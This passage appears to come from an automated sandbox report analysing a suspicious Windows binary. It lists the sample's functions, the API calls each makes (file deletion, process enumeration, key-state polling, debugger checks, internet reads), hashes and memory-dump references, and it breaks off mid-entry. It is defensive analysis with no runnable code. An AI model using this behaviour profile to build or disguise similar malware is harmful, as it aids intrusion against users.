                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CF121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00C5BC09
                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00CF1270,000000FF,?,0000003F,00000000,?), ref: 00C5BC36
                                                                      • _free.LIBCMT ref: 00C5BD4B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                      • String ID:
                                                                      • API String ID: 314583886-0
                                                                      • Opcode ID: b5742a71cd19eee3336a8aa653c3a12deac8b34ab785dc15addff16e6da3df36
                                                                      • Instruction ID: 5a84e7d6990c66a217f653d2ca5a0c6a1fd62e844788840c1ace39736d38509d
                                                                      • Opcode Fuzzy Hash: b5742a71cd19eee3336a8aa653c3a12deac8b34ab785dc15addff16e6da3df36
                                                                      • Instruction Fuzzy Hash: 73C119799042459FCB209F698C41BBEBFB8EF41311F18419AECA4D7251EB309E89D758
                                                                      Function 00C8D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C23AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C23A97,?,?,00C22E7F,?,?,?,00000000), ref: 00C23AC2
                                                                        • Part of subcall function 00C8E199: GetFileAttributesW.KERNEL32(?,00C8CF95), ref: 00C8E19A
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C8D420
                                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C8D470
                                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C8D481
                                                                      • FindClose.KERNEL32(00000000), ref: 00C8D498
                                                                      • FindClose.KERNEL32(00000000), ref: 00C8D4A1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: b1a37533e4eaddecf5d21dd2ec89e26c1556e6c957978e468ed6e6ffd3264d59
                                                                      • Instruction ID: 385d25e6f6c1257ab0328ff290b88138927f1b3211082b7caf5e99394136bb3e
                                                                      • Opcode Fuzzy Hash: b1a37533e4eaddecf5d21dd2ec89e26c1556e6c957978e468ed6e6ffd3264d59
                                                                      • Instruction Fuzzy Hash: 90315E710083959BC304FF64D8919AFB7A8BE95314F444E2DF4E2931E1EB30AA09DB67
                                                                      Function 00C5E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: __floor_pentium4
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                      • API String ID: 4168288129-2761157908
                                                                      • Opcode ID: 90cf1ba26d00bf62975b924a9ae21002bcb4040cdfa10c40aba5b848ae528631
                                                                      • Instruction ID: 43c13555841c66877fa6bd66b1aa213a91b926109db9cf76250ab0fd0dc3de05
                                                                      • Opcode Fuzzy Hash: 90cf1ba26d00bf62975b924a9ae21002bcb4040cdfa10c40aba5b848ae528631
                                                                      • Instruction Fuzzy Hash: 31C24B75E046288FDB29CE28CD407EAB7B5EB48306F1441EAD85DE7241E774AF868F44
                                                                      Function 00C8719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C87206
                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C8723C
                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C8724D
                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C872CF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                      • String ID: DllGetClassObject
                                                                      • API String ID: 753597075-1075368562
                                                                      • Opcode ID: 8626f16b3ceddf59b46abf067799d27547c56d3f55f638253bf5aaea1336d9b7
                                                                      • Instruction ID: d5b0327e33027e95160419cd793e17905278c56e79f1119325ee889534c93e0b
                                                                      • Opcode Fuzzy Hash: 8626f16b3ceddf59b46abf067799d27547c56d3f55f638253bf5aaea1336d9b7
                                                                      • Instruction Fuzzy Hash: 8A419171604204EFDB15DF54C884B9A7BA9EF84318F2582ADBD05DF21AE7B0DE40CBA4
                                                                      Function 00C99B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C29CB3: _wcslen.LIBCMT ref: 00C29CBD
                                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00C99B78
                                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00C99C8B
                                                                        • Part of subcall function 00C93874: GetInputState.USER32 ref: 00C938CB
                                                                        • Part of subcall function 00C93874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C93966
                                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00C99BA8
                                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00C99C75
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                      • String ID: *.*
                                                                      • API String ID: 1972594611-438819550
                                                                      • Opcode ID: c2e248b58c127fa6dd3a4c5638fe94252d5d85e4f502652d407a1986aeb5341a
                                                                      • Instruction ID: 6aff522b57f1ce83d6a78a592ed5eaeadd25d96086cd101c02ca496c27fe557d
                                                                      • Opcode Fuzzy Hash: c2e248b58c127fa6dd3a4c5638fe94252d5d85e4f502652d407a1986aeb5341a
                                                                      • Instruction Fuzzy Hash: 1041607194421AAFCF14DF68DC89AEEBBB8FF05310F24416AE815A2191EB309F44DF61
                                                                      Function 00C3997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00C39BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00C39BB2
                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C39A4E
                                                                      • GetSysColor.USER32(0000000F), ref: 00C39B23
                                                                      • SetBkColor.GDI32(?,00000000), ref: 00C39B36
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Color$LongProcWindow
                                                                      • String ID:
                                                                      • API String ID: 3131106179-0
                                                                      • Opcode ID: 39ba9ec05adac6c3d90c153ddedf2f93cf4609453dd84301e9da47b644d41dcb
                                                                      • Instruction ID: 03a94af83d8e82caa44578b9837308fcec1653fad642d7e20d847bc69d824054
                                                                      • Opcode Fuzzy Hash: 39ba9ec05adac6c3d90c153ddedf2f93cf4609453dd84301e9da47b644d41dcb
                                                                      • Instruction Fuzzy Hash: C2A15C71128408EEE729AA3E8C99FBF365DDB42340F154309F522C66A5CAB59F01E272
                                                                      Function 00C3912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCursorPos.USER32(?), ref: 00C39141
                                                                      • ScreenToClient.USER32(00000000,?), ref: 00C3915E
                                                                      • GetAsyncKeyState.USER32(00000001), ref: 00C39183
                                                                      • GetAsyncKeyState.USER32(00000002), ref: 00C3919D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                      • String ID:
                                                                      • API String ID: 4210589936-0
                                                                      • Opcode ID: f2d612f701c97f06d2b8780d38e7cd092456866c84bf14511da0517f6a5ab381
                                                                      • Instruction ID: e74605a7a727a6151b12fb8545cd6f26cd1c114154e10a2975436e5db215fb13
                                                                      • Opcode Fuzzy Hash: f2d612f701c97f06d2b8780d38e7cd092456866c84bf14511da0517f6a5ab381
                                                                      • Instruction Fuzzy Hash: C7414D31A0861AFBDF159F64C848BEEB774FB05320F208329E429A7290C7746A54DF91
                                                                      Function 00C810F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C81114
                                                                      • GetLastError.KERNEL32(?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81120
                                                                      • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C8112F
                                                                      • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C80B9B,?,?,?), ref: 00C81136
                                                                      • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C8114D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 842720411-0
                                                                      • Opcode ID: 52c6cd12589608198fea65056eba3658f9205864f215dd97056ea64c49d7048e
                                                                      • Instruction ID: a5a96bfed977e70e1e3e8b5d1173b901074d89a05c9299d53b463c763e1e4c45
                                                                      • Opcode Fuzzy Hash: 52c6cd12589608198fea65056eba3658f9205864f215dd97056ea64c49d7048e
                                                                      • Instruction Fuzzy Hash: 00016975200205BFDB115FA8DC8DBAE3BAEEF893A4F240419FA41E3360DA31DD008B60
                                                                      Function 00C28060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                      • API String ID: 0-1546025612
                                                                      • Opcode ID: 9496d5b990d85aeebd087d8d5fb06d5fc52e69a33df2dadc01a37a589759942d
                                                                      • Instruction ID: 52942769dd738d46396b985ca1409def38c0fa05db0c6e187167ab63bafd2c22
                                                                      • Opcode Fuzzy Hash: 9496d5b990d85aeebd087d8d5fb06d5fc52e69a33df2dadc01a37a589759942d
                                                                      • Instruction Fuzzy Hash: 27A2A070E0162ACBDF34CF59D8907ADB7B1BF54310F2481AAE825A7684DB749E85CF90
                                                                      Function 00C8D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00C8D501
                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00C8D50F
                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00C8D52F
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00C8D5DC
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 420147892-0
                                                                      • Opcode ID: 3dfc21c54ec53ea60ea092ea8224c5ed93f5b817746dd546280d31384283d212
                                                                      • Instruction ID: 590048f85dd6ca1ca63e158975a11d27f885f25e48db3ada6ca8d9e8005e6406
                                                                      • Opcode Fuzzy Hash: 3dfc21c54ec53ea60ea092ea8224c5ed93f5b817746dd546280d31384283d212
                                                                      • Instruction Fuzzy Hash: 3E31A0711083009FD300EF54D881BAFBBF8EF99358F14092DF582961E1EB719A48DBA2
                                                                      Function 00C9CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 00C9CE89
                                                                      • GetLastError.KERNEL32(?,00000000), ref: 00C9CEEA
                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 00C9CEFE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                      • String ID:
                                                                      • API String ID: 234945975-0
                                                                      • Opcode ID: af15bc6064841c33725ec2c6a7ef2836821a56a594f761ea00915949a51429f4
                                                                      • Instruction ID: 358549eb394765b9d9d9fb1904bf37359ab8212f07cdec5d7764e6c9e23326cf
                                                                      • Opcode Fuzzy Hash: af15bc6064841c33725ec2c6a7ef2836821a56a594f761ea00915949a51429f4
                                                                      • Instruction Fuzzy Hash: CA21ACB1900705EBEF20DFA6C988BABB7FCEB50354F10442EE556D2151E770EE049B60
                                                                      Function 00C8DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,00C65222), ref: 00C8DBCE
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 00C8DBDD
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C8DBEE
                                                                      • FindClose.KERNEL32(00000000), ref: 00C8DBFA
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                      • String ID:
                                                                      • API String ID: 2695905019-0
                                                                      • Opcode ID: 438a329c50dae272d230189913c443148ddf884473f791442d0290b68eba845d
                                                                      • Instruction ID: 89b52405fd4f394b89de54686912e10796b291827fda286346169963f6f74753
                                                                      • Opcode Fuzzy Hash: 438a329c50dae272d230189913c443148ddf884473f791442d0290b68eba845d
                                                                      • Instruction Fuzzy Hash: BFF0A030810910578320BB7CAC4DAAE376C9E01338F104702F836C20F0EBB05E54879A
                                                                      Function 00C88298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C882AA
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: lstrlen
                                                                      • String ID: ($|
                                                                      • API String ID: 1659193697-1631851259
                                                                      • Opcode ID: a4ab0df9b1c12b301ef34b04e41c07d03ff5680966e89fed698bdda67a113c15
                                                                      • Instruction ID: aadd2488830441c9da988579c04702c6c563a502a193c116ac143f20cc3ed3e9
                                                                      • Opcode Fuzzy Hash: a4ab0df9b1c12b301ef34b04e41c07d03ff5680966e89fed698bdda67a113c15
                                                                      • Instruction Fuzzy Hash: 9C324474A006059FCB28DF19C080A6AB7F0FF48714B51C46EE5AADB7A1EB70E981CB44
                                                                      Function 00C95C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00C95CC1
                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 00C95D17
                                                                      • FindClose.KERNEL32(?), ref: 00C95D5F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: aefb456aa0a3209d68b184db133a7b1fdae9df5f3deec6f9c68fd3e2dbc8267d
                                                                      • Instruction ID: 5edeeec4ed9fa6ce936d1447d8b6542a1a791b511c6d73e0666b6a92978a406c
                                                                      • Opcode Fuzzy Hash: aefb456aa0a3209d68b184db133a7b1fdae9df5f3deec6f9c68fd3e2dbc8267d
                                                                      • Instruction Fuzzy Hash: 93519B756046019FCB14DF28D498E9AB7E4FF49314F14855EE96A8B3A2CB30ED04CF91
                                                                      Function 00C52622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsDebuggerPresent.KERNEL32 ref: 00C5271A
                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C52724
                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 00C52731
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171937960.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_c20000_1162-201.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: 2ec032e04ecfa874febb1222ecbc25bb1462c83660be26ead833702efef1d8aa
                                                                      • Instruction ID: 028b54ce5e5dbbdbf29b72ea1357bf8aa73367211727cdb3e9c49dfd6f146731
                                                                      • Opcode Fuzzy Hash: 2ec032e04ecfa874febb1222ecbc25bb1462c83660be26ead833702efef1d8aa
                                                                      • Instruction Fuzzy Hash: C631B5759512189BCB21DF64DC89BDDB7B8BF08310F5042EAE81CA7261E7309F859F45
                                                                      Function 00C951CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00C951DA
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00C95238
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00C952A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2171812128.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true
                                                                      • Associated: 00000000.00000002.2171790552.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CBC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171869886.0000000000CE2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2171917553.0000000000CEC000.00000004.00000001.01000000.00000003.sdmpDownload File
